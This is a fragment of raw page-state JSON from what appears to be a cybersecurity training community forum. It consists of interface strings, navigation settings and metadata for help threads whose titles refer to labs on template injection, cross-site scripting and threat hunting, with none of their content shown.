uncateBodyLength":-1,"useNodeLink":true,"usePreviewMedia":false,"timeStampType":"conversation.lastPostingActivityTime","avatarSize":"40","useTextBody":true,"useSolvedBadge":true,"subjectAs":"h6","renderPostTimeBeforeAuthor":true,"useAvatar":true,"useTimeToRead":false,"useSpoilerFreeBody":true,"useKudosCount":false,"useViewCount":false,"useBody":false,"useTags":false,"clampSubjectLines":1,"useBoardIcon":false,"useMessageTimeLink":true,"clampBodyLines":3,"useAuthorLogin":true,"useUnreadCount":false,"useNodeHoverCard":true,"useSearchSnippet":false}},"panelType":"divider","sorts":{"conversationLastPostingActivityTime":{"direction":"DESC"}},"lazyLoad":false},"__typename":"QuiltComponent"}],"__typename":"MainSideSectionColumns"}}],"__typename":"QuiltContainer"},"__typename":"Quilt","localOverride":false},"localOverride":false},"CachedAsset:text:en_US-components/common/EmailVerification-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/common/EmailVerification-1746024986000","value":{"email.verification.title":"Email Verification Required","email.verification.message.update.email":"To participate in the community, you must first verify your email address. The verification email was sent to {email}. To change your email, visit My Settings.","email.verification.message.resend.email":"To participate in the community, you must first verify your email address. The verification email was sent to {email}. Resend email."},"localOverride":false},"CachedAsset:text:en_US-pages/forums/ForumMessagePage-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-pages/forums/ForumMessagePage-1746024986000","value":{"title":"{contextMessageSubject} | {communityTitle}","errorMissing":"This message cannot be found","name":"Forum Message Page","section.message-list.title":"Forum Discussion","archivedMessageTitle":"This Content Has Been Archived"},"localOverride":false},"CachedAsset:text:en_US-components/common/ActionFeedback-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/common/ActionFeedback-1746024986000","value":{"joinedGroupHub.title":"Welcome","joinedGroupHub.message":"You are now a member of this group and are subscribed to updates.","groupHubInviteNotFound.title":"Invitation Not Found","groupHubInviteNotFound.message":"Sorry, we could not find your invitation to the group. The owner may have canceled the invite.","groupHubNotFound.title":"Group Not Found","groupHubNotFound.message":"The grouphub you tried to join does not exist. It may have been deleted.","existingGroupHubMember.title":"Already Joined","existingGroupHubMember.message":"You are already a member of this group.","accountLocked.title":"Account Locked","accountLocked.message":"Your account has been locked due to multiple failed attempts. Try again in {lockoutTime} minutes.","editedGroupHub.title":"Changes Saved","editedGroupHub.message":"Your group has been updated.","leftGroupHub.title":"Goodbye","leftGroupHub.message":"You are no longer a member of this group and will not receive future updates.","deletedGroupHub.title":"Deleted","deletedGroupHub.message":"The group has been deleted.","groupHubCreated.title":"Group Created","groupHubCreated.message":"{groupHubName} is ready to use","accountClosed.title":"Account Closed","accountClosed.message":"The account has been closed and you will now be redirected to the homepage","resetTokenExpired.title":"Reset Password Link has Expired","resetTokenExpired.message":"Try resetting your password again","invalidUrl.title":"Invalid URL","invalidUrl.message":"The URL you're using is not recognized. Verify your URL and try again.","accountClosedForUser.title":"Account Closed","accountClosedForUser.message":"{userName}'s account is closed","inviteTokenInvalid.title":"Invitation Invalid","inviteTokenInvalid.message":"Your invitation to the community has been canceled or expired.","inviteTokenError.title":"Invitation Verification Failed","inviteTokenError.message":"The url you are utilizing is not recognized. Verify your URL and try again","pageNotFound.title":"Access Denied","pageNotFound.message":"You do not have access to this area of the community or it doesn't exist","eventAttending.title":"Responded as Attending","eventAttending.message":"You'll be notified when there's new activity and reminded as the event approaches","eventInterested.title":"Responded as Interested","eventInterested.message":"You'll be notified when there's new activity and reminded as the event approaches","eventNotFound.title":"Event Not Found","eventNotFound.message":"The event you tried to respond to does not exist.","redirectToRelatedPage.title":"Showing Related Content","redirectToRelatedPageForBaseUsers.title":"Showing Related Content","redirectToRelatedPageForBaseUsers.message":"The content you are trying to access is archived","redirectToRelatedPage.message":"The content you are trying to access is archived","relatedUrl.archivalLink.flyoutMessage":"The content you are trying to access is archived View Archived Content"},"localOverride":false},"CachedAsset:quiltWrapper:immersivelabs.prod:Common:1746142282169":{"__typename":"CachedAsset","id":"quiltWrapper:immersivelabs.prod:Common:1746142282169","value":{"id":"Common","header":{"backgroundImageProps":{"assetName":null,"backgroundSize":"COVER","backgroundRepeat":"NO_REPEAT","backgroundPosition":"CENTER_CENTER","lastModified":null,"__typename":"BackgroundImageProps"},"backgroundColor":"var(--lia-bs-body-color)","items":[{"id":"community.widget.navbarWidget","props":{"showUserName":false,"showRegisterLink":false,"useIconLanguagePicker":true,"useLabelLanguagePicker":true,"className":"QuiltComponent_lia-component-edit-mode__0nCcm","links":{"sideLinks":[],"mainLinks":[{"children":[{"linkType":"INTERNAL","id":"get-started-link","params":{"boardId":"get-started","categoryId":"welcome"},"routeName":"TkbBoardPage"},{"linkType":"INTERNAL","id":"migrated-link-2","params":{"boardId":"community-forum","categoryId":"welcome"},"routeName":"ForumBoardPage"},{"linkType":"INTERNAL","id":"migrated-link-1","params":{"boardId":"community-blog","categoryId":"welcome"},"routeName":"BlogBoardPage"},{"linkType":"EXTERNAL","id":"Common-external-link","url":"https://community.immersivelabs.com/tag/community%20challenge","target":"SELF"}],"linkType":"INTERNAL","id":"migrated-link-0","params":{"categoryId":"welcome"},"routeName":"CategoryPage"},{"children":[{"linkType":"INTERNAL","id":"help","params":{"boardId":"help","categoryId":"help"},"routeName":"ForumBoardPage"},{"linkType":"EXTERNAL","id":"external-2","url":"https://community.immersivelabs.com/category/help/discussions/help?messages.widget.messagelistfornodebyrecentactivitywidget-tab-main-ochszs-0=noSolutions","target":"SELF"},{"linkType":"INTERNAL","id":"cybertrust-massachusetts-link","params":{"groupHubId":"cybertrust-massachusetts"},"routeName":"GroupHubPage"},{"linkType":"EXTERNAL","id":"external-1","url":"https://immersivelabs.zendesk.com/hc/en-us","target":"BLANK"}],"linkType":"INTERNAL","id":"migrated-link-3","params":{"boardId":"help","categoryId":"discuss"},"routeName":"ForumBoardPage"},{"children":[{"linkType":"INTERNAL","id":"customer-blog","params":{"boardId":"customer-blog","categoryId":"blogs"},"routeName":"BlogBoardPage"},{"linkType":"INTERNAL","id":"the-human-connection-blog","params":{"boardId":"the-human-connection-blog","categoryId":"blogs"},"routeName":"BlogBoardPage"},{"linkType":"EXTERNAL","id":"external","url":"https://www.immersivelabs.com/resources/blog","target":"BLANK"}],"linkType":"INTERNAL","id":"migrated-link-4","params":{"categoryId":"blogs"},"routeName":"CategoryPage"},{"children":[{"linkType":"INTERNAL","id":"migrated-link-10","params":{"boardId":"customer-events","categoryId":"events"},"routeName":"EventBoardPage"},{"linkType":"INTERNAL","id":"migrated-link-11","params":{"boardId":"community-events","categoryId":"events"},"routeName":"EventBoardPage"}],"linkType":"INTERNAL","id":"migrated-link-9","params":{"categoryId":"events"},"routeName":"CategoryPage"},{"children":[{"linkType":"INTERNAL","id":"migrated-link-13","params":{"boardId":"cyber-million","categoryId":"cyber-million"},"routeName":"ForumBoardPage"},{"linkType":"EXTERNAL","id":"external-3","url":"https://community.immersivelabs.com/category/cyber-million/discussions/cyber-million?messages.widget.messagelistfornodebyrecentactivitywidget-tab-main-ouwewl-0=noSolutions","target":"SELF"},{"linkType":"INTERNAL","id":"migrated-link-14","params":{"boardId":"cyber-million-blog","categoryId":"cyber-million"},"routeName":"BlogBoardPage"},{"linkType":"EXTERNAL","id":"migrated-link-15","url":"https://www.immersivelabs.com/resources/cybermillion","target":"BLANK"}],"linkType":"INTERNAL","id":"migrated-link-12","params":{"categoryId":"cyber-million"},"routeName":"CategoryPage"}]},"style":{"boxShadow":"0","linkFontWeight":"500","controllerHighlightColor":"#E45C65","dropdownDividerMarginBottom":"10px","hamburgerBorderHover":"none","linkFontSize":"16px","linkBoxShadowHover":"none","backgroundOpacity":1,"controllerBorderRadius":"var(--lia-border-radius-50)","hamburgerBgColor":"transparent","linkTextBorderBottom":"none","hamburgerColor":"var(--lia-nav-controller-icon-color)","brandLogoHeight":"80px","linkLetterSpacing":"normal","linkBgHoverColor":"transparent","collapseMenuDividerOpacity":0.16,"paddingBottom":"0px","dropdownPaddingBottom":"15px","dropdownMenuOffset":"2px","hamburgerBgHoverColor":"transparent","borderBottom":"0","hamburgerBorder":"none","dropdownPaddingX":"10px","brandMarginRightSm":"10px","linkBoxShadow":"none","linkJustifyContent":"flex-end","linkColor":"var(--lia-bs-body-bg)","collapseMenuDividerBg":"var(--lia-nav-link-color)","dropdownPaddingTop":"10px","controllerHighlightTextColor":"var(--lia-yiq-dark)","controllerTextColor":"var(--lia-nav-controller-icon-color)","background":{"imageAssetName":"","color":"var(--lia-bs-body-color)","size":"COVER","repeat":"NO_REPEAT","position":"CENTER_CENTER","imageLastModified":""},"linkBorderRadius":"var(--lia-bs-border-radius-sm)","linkHoverColor":"var(--lia-bs-primary)","position":"FIXED","linkBorder":"none","linkTextBorderBottomHover":"0","brandMarginRight":"30px","hamburgerHoverColor":"var(--lia-nav-controller-icon-color)","linkBorderHover":"none","collapseMenuMarginLeft":"20px","linkFontStyle":"NORMAL","linkPaddingX":"10px","controllerTextHoverColor":"var(--lia-nav-controller-icon-hover-color)","paddingTop":"0px","linkPaddingY":"5px","linkTextTransform":"NONE","dropdownBorderColor":"hsla(var(--lia-bs-white-h), var(--lia-bs-white-s), var(--lia-bs-white-l), 0.08)","controllerBgHoverColor":"hsla(var(--lia-bs-white-h), var(--lia-bs-white-s), var(--lia-bs-white-l), 0.1)","linkDropdownPaddingX":"var(--lia-nav-link-px)","linkBgColor":"transparent","linkDropdownPaddingY":"9px","controllerIconColor":"var(--lia-bs-body-bg)","dropdownDividerMarginTop":"10px","linkGap":"10px","controllerIconHoverColor":"var(--lia-bs-body-bg)"},"showSearchIcon":true,"languagePickerStyle":"iconAndLabel"},"__typename":"QuiltComponent"},{"id":"community.widget.bannerWidget","props":{"backgroundColor":"transparent","visualEffects":{"showBottomBorder":true},"backgroundOpacity":50,"backgroundImageProps":{"backgroundSize":"COVER","backgroundPosition":"CENTER_CENTER","backgroundRepeat":"NO_REPEAT"},"fontColor":"var(--lia-bs-body-bg)"},"__typename":"QuiltComponent"},{"id":"community.widget.breadcrumbWidget","props":{"backgroundColor":"var(--lia-bs-body-color)","linkHighlightColor":"var(--lia-bs-body-bg)","visualEffects":{"showBottomBorder":false},"backgroundOpacity":100,"linkTextColor":"var(--lia-bs-body-bg)"},"__typename":"QuiltComponent"}],"__typename":"QuiltWrapperSection"},"footer":{"backgroundImageProps":{"assetName":null,"backgroundSize":"COVER","backgroundRepeat":"NO_REPEAT","backgroundPosition":"CENTER_CENTER","lastModified":null,"__typename":"BackgroundImageProps"},"backgroundColor":"var(--lia-bs-gray-200)","items":[{"id":"community.widget.footerWidget","props":null,"__typename":"QuiltComponent"},{"id":"custom.widget.Custom_Scripts","props":{"widgetVisibility":"signedInOrAnonymous","customComponentId":"custom.widget.Custom_Scripts","useBackground":false},"__typename":"QuiltComponent"}],"__typename":"QuiltWrapperSection"},"__typename":"QuiltWrapper","localOverride":false},"localOverride":false},"QueryVariables:TopicReplyList:message:506:1":{"__typename":"QueryVariables","id":"TopicReplyList:message:506:1","value":{"id":"message:506","first":10,"sorts":{"kudosSumWeight":{"direction":"DESC","order":0},"postTime":{"direction":"ASC","order":1}},"repliesFirst":3,"repliesFirstDepthThree":1,"repliesSorts":{"kudosSumWeight":{"direction":"DESC","order":0},"postTime":{"direction":"ASC","order":1}},"useAvatar":true,"useAuthorLogin":true,"useAuthorRank":true,"useBody":true,"useKudosCount":true,"useTimeToRead":false,"useMedia":false,"useReadOnlyIcon":false,"useRepliesCount":true,"useSearchSnippet":false,"useAcceptedSolutionButton":true,"useSolvedBadge":false,"useAttachments":false,"attachmentsFirst":5,"useTags":true,"useNodeAncestors":false,"useUserHoverCard":false,"useNodeHoverCard":false,"useModerationStatus":true,"usePreviewSubjectModal":false,"useMessageStatus":true}},"ROOT_MUTATION":{"__typename":"Mutation"},"CachedAsset:component:custom.widget.Custom_Scripts-en-us-1746142344026":{"__typename":"CachedAsset","id":"component:custom.widget.Custom_Scripts-en-us-1746142344026","value":{"component":{"id":"custom.widget.Custom_Scripts","template":{"id":"Custom_Scripts","markupLanguage":"HANDLEBARS","style":null,"texts":{},"defaults":{"config":{"applicablePages":[],"description":"","fetchedContent":null,"__typename":"ComponentConfiguration"},"props":[],"__typename":"ComponentProperties"},"components":[{"id":"custom.widget.Custom_Scripts","form":null,"config":null,"props":[],"__typename":"Component"}],"grouping":"CUSTOM","__typename":"ComponentTemplate"},"properties":{"config":{"applicablePages":[],"description":"","fetchedContent":null,"__typename":"ComponentConfiguration"},"props":[],"__typename":"ComponentProperties"},"form":null,"__typename":"Component","localOverride":false},"globalCss":null,"form":null},"localOverride":false},"CachedAsset:text:en_US-components/community/Breadcrumb-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/community/Breadcrumb-1746024986000","value":{"navLabel":"Breadcrumbs","dropdown":"Additional parent page navigation"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageBanner-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageBanner-1746024986000","value":{"messageMarkedAsSpam":"This post has been marked as spam","messageMarkedAsSpam@board:TKB":"This article has been marked as spam","messageMarkedAsSpam@board:BLOG":"This post has been marked as spam","messageMarkedAsSpam@board:FORUM":"This discussion has been marked as spam","messageMarkedAsSpam@board:OCCASION":"This event has been marked as spam","messageMarkedAsSpam@board:IDEA":"This idea has been marked as spam","manageSpam":"Manage Spam","messageMarkedAsAbuse":"This post has been marked as abuse","messageMarkedAsAbuse@board:TKB":"This article has been marked as abuse","messageMarkedAsAbuse@board:BLOG":"This post has been marked as abuse","messageMarkedAsAbuse@board:FORUM":"This discussion has been marked as abuse","messageMarkedAsAbuse@board:OCCASION":"This event has been marked as abuse","messageMarkedAsAbuse@board:IDEA":"This idea has been marked as abuse","preModCommentAuthorText":"This comment will be published as soon as it is approved","preModCommentModeratorText":"This comment is awaiting moderation","messageMarkedAsOther":"This post has been rejected due to other reasons","messageMarkedAsOther@board:TKB":"This article has been rejected due to other reasons","messageMarkedAsOther@board:BLOG":"This post has been rejected due to other reasons","messageMarkedAsOther@board:FORUM":"This discussion has been rejected due to other reasons","messageMarkedAsOther@board:OCCASION":"This event has been rejected due to other reasons","messageMarkedAsOther@board:IDEA":"This idea has been rejected due to other reasons","messageArchived":"This post was archived on {date}","relatedUrl":"View Related Content","relatedContentText":"Showing related content","archivedContentLink":"View Archived Content"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageView/MessageViewStandard-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageView/MessageViewStandard-1746024986000","value":{"anonymous":"Anonymous","author":"{messageAuthorLogin}","authorBy":"{messageAuthorLogin}","board":"{messageBoardTitle}","replyToUser":" to {parentAuthor}","showMoreReplies":"Show More","replyText":"Reply","repliesText":"Replies","markedAsSolved":"Marked as Solution","movedMessagePlaceholder.BLOG":"{count, plural, =0 {This comment has been} other {These comments have been} }","movedMessagePlaceholder.TKB":"{count, plural, =0 {This comment has been} other {These comments have been} }","movedMessagePlaceholder.FORUM":"{count, plural, =0 {This reply has been} other {These replies have been} }","movedMessagePlaceholder.IDEA":"{count, plural, =0 {This comment has been} other {These comments have been} }","movedMessagePlaceholder.OCCASION":"{count, plural, =0 {This comment has been} other {These comments have been} }","movedMessagePlaceholderUrlText":"moved.","messageStatus":"Status: ","statusChanged":"Status changed: {previousStatus} to {currentStatus}","statusAdded":"Status added: {status}","statusRemoved":"Status removed: {status}","labelExpand":"expand replies","labelCollapse":"collapse replies","unhelpfulReason.reason1":"Content is outdated","unhelpfulReason.reason2":"Article is missing information","unhelpfulReason.reason3":"Content is for a different Product","unhelpfulReason.reason4":"Doesn't match what I was searching for"},"localOverride":false},"CachedAsset:text:en_US-components/messages/ThreadedReplyList-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/ThreadedReplyList-1746024986000","value":{"title":"{count, plural, one{# Reply} other{# Replies}}","title@board:BLOG":"{count, plural, one{# Comment} other{# Comments}}","title@board:TKB":"{count, plural, one{# Comment} other{# Comments}}","title@board:IDEA":"{count, plural, one{# Comment} other{# Comments}}","title@board:OCCASION":"{count, plural, one{# Comment} other{# Comments}}","noRepliesTitle":"No Replies","noRepliesTitle@board:BLOG":"No Comments","noRepliesTitle@board:TKB":"No Comments","noRepliesTitle@board:IDEA":"No Comments","noRepliesTitle@board:OCCASION":"No Comments","noRepliesDescription":"Be the first to reply","noRepliesDescription@board:BLOG":"Be the first to comment","noRepliesDescription@board:TKB":"Be the first to comment","noRepliesDescription@board:IDEA":"Be the first to comment","noRepliesDescription@board:OCCASION":"Be the first to comment","messageReadOnlyAlert:BLOG":"Comments have been turned off for this post","messageReadOnlyAlert:TKB":"Comments have been turned off for this article","messageReadOnlyAlert:IDEA":"Comments have been turned off for this idea","messageReadOnlyAlert:FORUM":"Replies have been turned off for this discussion","messageReadOnlyAlert:OCCASION":"Comments have been turned off for this event"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageReplyCallToAction-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageReplyCallToAction-1746024986000","value":{"leaveReply":"Leave a reply...","leaveReply@board:BLOG@message:root":"Leave a comment...","leaveReply@board:TKB@message:root":"Leave a comment...","leaveReply@board:IDEA@message:root":"Leave a comment...","leaveReply@board:OCCASION@message:root":"Leave a comment...","repliesTurnedOff.FORUM":"Replies are turned off for this topic","repliesTurnedOff.BLOG":"Comments are turned off for this topic","repliesTurnedOff.TKB":"Comments are turned off for this topic","repliesTurnedOff.IDEA":"Comments are turned off for this topic","repliesTurnedOff.OCCASION":"Comments are turned off for this topic","infoText":"Stop poking me!"},"localOverride":false},"CachedAsset:text:en_US-components/featured/places/FeaturedPlacesWidget-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/featured/places/FeaturedPlacesWidget-1746024986000","value":{"title":"Featured Places","description":"Custom list of categories, boards, and groups that you define","title@instance:featuredWidgets.widget.featuredPlacesWidget-1723716011813":"Cybersecurity Awareness Month","title@instance:featuredWidgets.widget.featuredPlacesWidget-1714054236434":"Explore The Community","title@instance:featuredWidgets.widget.featuredPlacesWidget-1717485561171":"Places","title@instance:featuredWidgets.widget.featuredPlacesWidget-1733305579381":"Cyber Countdown","title@instance:featuredWidgets.widget.featuredPlacesWidget-1714132737520":"First Time? Start Here ","title@instance:featuredWidgets.widget.featuredPlacesWidget-1717595852814":"","title@instance:featuredWidgets.widget.featuredPlacesWidget-1725897163378":"Explore Other Forums","title@instance:featuredWidgets.widget.featuredPlacesWidget-1716895063919":"Upcoming Events","title@instance:featuredWidgets.widget.featuredPlacesWidget-1725897102867":"Explore Other Forums","title@instance:featuredWidgets.widget.featuredPlacesWidget-1725896893799":"Explore Other Forums"},"localOverride":false},"CachedAsset:text:en_US-components/messages/RelatedContentWidget-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/RelatedContentWidget-1746024986000","value":{"title":"Related Content","emptyDescription":"No content to show"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageListForNodeByRecentActivityWidget-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageListForNodeByRecentActivityWidget-1746024986000","value":{"title@userScope:other":"Recent Content","title@userScope:self":"Contributions","title@board:FORUM@userScope:other":"Recent Discussions","title@board:BLOG@userScope:other":"Recent Blogs","emptyDescription":"No content to show","MessageListForNodeByRecentActivityWidgetEditor.nodeScope.label":"Scope","title@instance:1714564690968":"Recent Blog Posts","title@instance:1715289331950":"Recent Discussions","title@instance:1711748122224":"Feed","title@instance:1714134050806":"What's New?"},"localOverride":false},"CachedAsset:text:en_US-components/community/FooterWidget-1746024986000":{"__typename":"CachedAsset","id":"text:en_US-components/community/FooterWidget-1746024986000","value":{"homeLink":"Community Home","topOfPage":"Top of Page","buildHash":"Build Hash:","buildNumber":"Build Number:","buildTime":"Build Time:","privacyPolicy":"Privacy Policy","helpLink":"Help"},"localOverride":false},"Category:category:welcome":{"__typename":"Category","id":"category:welcome","categoryPolicies":{"__typename":"CategoryPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}}},"Blog:board:community-blog":{"__typename":"Blog","id":"board:community-blog","blogPolicies":{"__typename":"BlogPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}},"boardPolicies":{"__typename":"BoardPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}}},"Category:category:events":{"__typename":"Category","id":"category:events","categoryPolicies":{"__typename":"CategoryPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}}},"Category:category:cyber-million":{"__typename":"Category","id":"category:cyber-million","categoryPolicies":{"__typename":"CategoryPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}}},"Forum:board:cyber-million":{"__typename":"Forum","id":"board:cyber-million","forumPolicies":{"__typename":"ForumPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}},"boardPolicies":{"__typename":"BoardPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}}},"Blog:board:cyber-million-blog":{"__typename":"Blog","id":"board:cyber-million-blog","blogPolicies":{"__typename":"BlogPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}},"boardPolicies":{"__typename":"BoardPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}}},"Occasion:board:community-events":{"__typename":"Occasion","id":"board:community-events","boardPolicies":{"__typename":"BoardPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}},"occasionPolicies":{"__typename":"OccasionPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}}},"Forum:board:community-forum":{"__typename":"Forum","id":"board:community-forum","forumPolicies":{"__typename":"ForumPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}},"boardPolicies":{"__typename":"BoardPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}}},"Category:category:blogs":{"__typename":"Category","id":"category:blogs","categoryPolicies":{"__typename":"CategoryPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}}},"Blog:board:the-human-connection-blog":{"__typename":"Blog","id":"board:the-human-connection-blog","blogPolicies":{"__typename":"BlogPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}},"boardPolicies":{"__typename":"BoardPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}}},"Tkb:board:get-started":{"__typename":"Tkb","id":"board:get-started","tkbPolicies":{"__typename":"TkbPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}},"boardPolicies":{"__typename":"BoardPolicies","canReadNode":{"__typename":"PolicyResult","failureReason":null}}},"Conversation:conversation:2122":{"__typename":"Conversation","id":"conversation:2122","topic":{"__typename":"ForumTopicMessage","uid":2122},"lastPostingActivityTime":"2025-05-05T12:24:00.819-07:00","solved":false},"ForumTopicMessage:message:2122":{"__typename":"ForumTopicMessage","subject":"Stuck on “Server-Side Template Injection: Ep.2 – Identifying SSTI Vulnerabilities”","conversation":{"__ref":"Conversation:conversation:2122"},"id":"message:2122","revisionNum":1,"uid":2122,"depth":0,"board":{"__ref":"Forum:board:help"},"author":{"__typename":"User","uid":1436,"login":"QuickSloth","registrationData":{"__typename":"RegistrationData","status":null},"deleted":false,"avatar":{"__typename":"UserAvatar","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/m_assets/avatars/default/avatar-2.svg?time=0"}},"metrics":{"__typename":"MessageMetrics","views":31},"postTime":"2025-04-29T07:11:44.640-07:00","lastPublishTime":"2025-04-29T07:11:44.640-07:00","readOnly":false},"Conversation:conversation:1965":{"__typename":"Conversation","id":"conversation:1965","topic":{"__typename":"ForumTopicMessage","uid":1965},"lastPostingActivityTime":"2025-05-05T09:55:00.957-07:00","solved":false},"ForumTopicMessage:message:1965":{"__typename":"ForumTopicMessage","subject":"Discovery: Enumeration Scripts – Part 1","conversation":{"__ref":"Conversation:conversation:1965"},"id":"message:1965","revisionNum":1,"uid":1965,"depth":0,"board":{"__ref":"Forum:board:help"},"author":{"__typename":"User","uid":534,"login":"jagira","registrationData":{"__typename":"RegistrationData","status":null},"deleted":false,"avatar":{"__typename":"UserAvatar","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/dS01MzQtc0w2NmpD?image-coordinates=0%2C0%2C800%2C800"}},"metrics":{"__typename":"MessageMetrics","views":85},"postTime":"2025-04-10T06:06:05.592-07:00","lastPublishTime":"2025-04-10T06:06:05.592-07:00","readOnly":false},"Conversation:conversation:2151":{"__typename":"Conversation","id":"conversation:2151","topic":{"__typename":"ForumTopicMessage","uid":2151},"lastPostingActivityTime":"2025-05-05T08:40:32.816-07:00","solved":false},"ForumTopicMessage:message:2151":{"__typename":"ForumTopicMessage","subject":"Confused in \"Threat Modeling Fundamentals; SQL Injection and Server-Side Template Injection\"","conversation":{"__ref":"Conversation:conversation:2151"},"id":"message:2151","revisionNum":1,"uid":2151,"depth":0,"board":{"__ref":"Forum:board:help"},"author":{"__typename":"User","uid":1436,"login":"QuickSloth","registrationData":{"__typename":"RegistrationData","status":null},"deleted":false,"avatar":{"__typename":"UserAvatar","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/m_assets/avatars/default/avatar-2.svg?time=0"}},"metrics":{"__typename":"MessageMetrics","views":16},"postTime":"2025-05-02T12:26:51.741-07:00","lastPublishTime":"2025-05-02T12:26:51.741-07:00","readOnly":false},"Conversation:conversation:2168":{"__typename":"Conversation","id":"conversation:2168","topic":{"__typename":"ForumTopicMessage","uid":2168},"lastPostingActivityTime":"2025-05-05T08:31:00.883-07:00","solved":false},"ForumTopicMessage:message:2168":{"__typename":"ForumTopicMessage","subject":"Do I need to create account with Hyperion.corp to access the labs?","conversation":{"__ref":"Conversation:conversation:2168"},"id":"message:2168","revisionNum":1,"uid":2168,"depth":0,"board":{"__ref":"Forum:board:help"},"author":{"__typename":"User","uid":1464,"login":"mo-ham","registrationData":{"__typename":"RegistrationData","status":null},"deleted":false,"avatar":{"__typename":"UserAvatar","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/m_assets/avatars/default/avatar-8.svg?time=0"}},"metrics":{"__typename":"MessageMetrics","views":4},"postTime":"2025-05-05T07:56:24.260-07:00","lastPublishTime":"2025-05-05T07:56:24.260-07:00","readOnly":false},"Conversation:conversation:2156":{"__typename":"Conversation","id":"conversation:2156","topic":{"__typename":"ForumTopicMessage","uid":2156},"lastPostingActivityTime":"2025-05-03T08:29:57.900-07:00","solved":false},"ForumTopicMessage:message:2156":{"__typename":"ForumTopicMessage","subject":"Threat Hunting: Investigating a Fake PoC Q9","conversation":{"__ref":"Conversation:conversation:2156"},"id":"message:2156","revisionNum":1,"uid":2156,"depth":0,"board":{"__ref":"Forum:board:help"},"author":{"__typename":"User","uid":1447,"login":"retornet","registrationData":{"__typename":"RegistrationData","status":null},"deleted":false,"avatar":{"__typename":"UserAvatar","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/m_assets/avatars/default/avatar-10.svg?time=0"}},"metrics":{"__typename":"MessageMetrics","views":20},"postTime":"2025-05-02T13:13:12.765-07:00","lastPublishTime":"2025-05-02T13:13:12.765-07:00","readOnly":false},"User:user:340":{"__typename":"User","id":"user:340","uid":340,"login":"IronLady18","biography":null,"registrationData":{"__typename":"RegistrationData","status":null,"registrationTime":"2024-10-10T07:00:57.487-07:00","confirmEmailStatus":null,"registrationAccessLevel":null,"ssoRegistrationFields":[]},"deleted":false,"email":"","avatar":{"__typename":"UserAvatar","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/m_assets/avatars/custom/Avatar_-_7-1718372257063.png?time=1718372296000"},"rank":{"__ref":"Rank:rank:8"},"messagesCount":2,"kudosGivenCount":0,"kudosReceivedCount":2,"kudosWeight":1,"ssoId":null,"followersCount":null,"solutionsCount":0,"entityType":"USER","eventPath":"community:dnvaw96485/user:340"},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bi00MS1jS0RtS1k\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bi00MS1jS0RtS1k","mimeType":"image/svg+xml"},"ForumTopicMessage:message:662":{"__typename":"ForumTopicMessage","uid":662,"subject":"Re: Cross-Site Scripting: Ep.6 – Further Exploitation","id":"message:662","revisionNum":2,"repliesCount":6,"author":{"__ref":"User:user:340"},"depth":0,"hasGivenKudo":false,"board":{"__ref":"Forum:board:help"},"conversation":{"__ref":"Conversation:conversation:662"},"moderationData":{"__ref":"ModerationData:moderation_data:662"},"postTime":"2024-10-10T07:16:41.480-07:00","lastPublishTime":"2024-10-10T07:43:37.145-07:00","readOnly":false,"metrics":{"__typename":"MessageMetrics","views":243},"placeholder":false,"originalMessageForPlaceholder":null,"isEscalated":null,"entityType":"FORUM_TOPIC","eventPath":"category:help/community:dnvaw96485board:help/message:662"},"Conversation:conversation:662":{"__typename":"Conversation","id":"conversation:662","solved":true,"topic":{"__ref":"ForumTopicMessage:message:662"},"lastPostingActivityTime":"2025-02-12T11:17:46.095-08:00","lastPostTime":"2025-02-12T11:17:46.095-08:00"},"ModerationData:moderation_data:662":{"__typename":"ModerationData","id":"moderation_data:662","status":"APPROVED","rejectReason":null},"RelatedContentMessage:RelatedContentMessage:662":{"__typename":"RelatedContentMessage","id":"RelatedContentMessage:662","relatedMessage":{"__ref":"ForumTopicMessage:message:662"}},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/cmstMTAtZkFjWTR6\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/cmstMTAtZkFjWTR6","height":160,"width":141,"mimeType":"image/png"},"Rank:rank:10":{"__typename":"Rank","id":"rank:10","position":18,"name":"Bronze 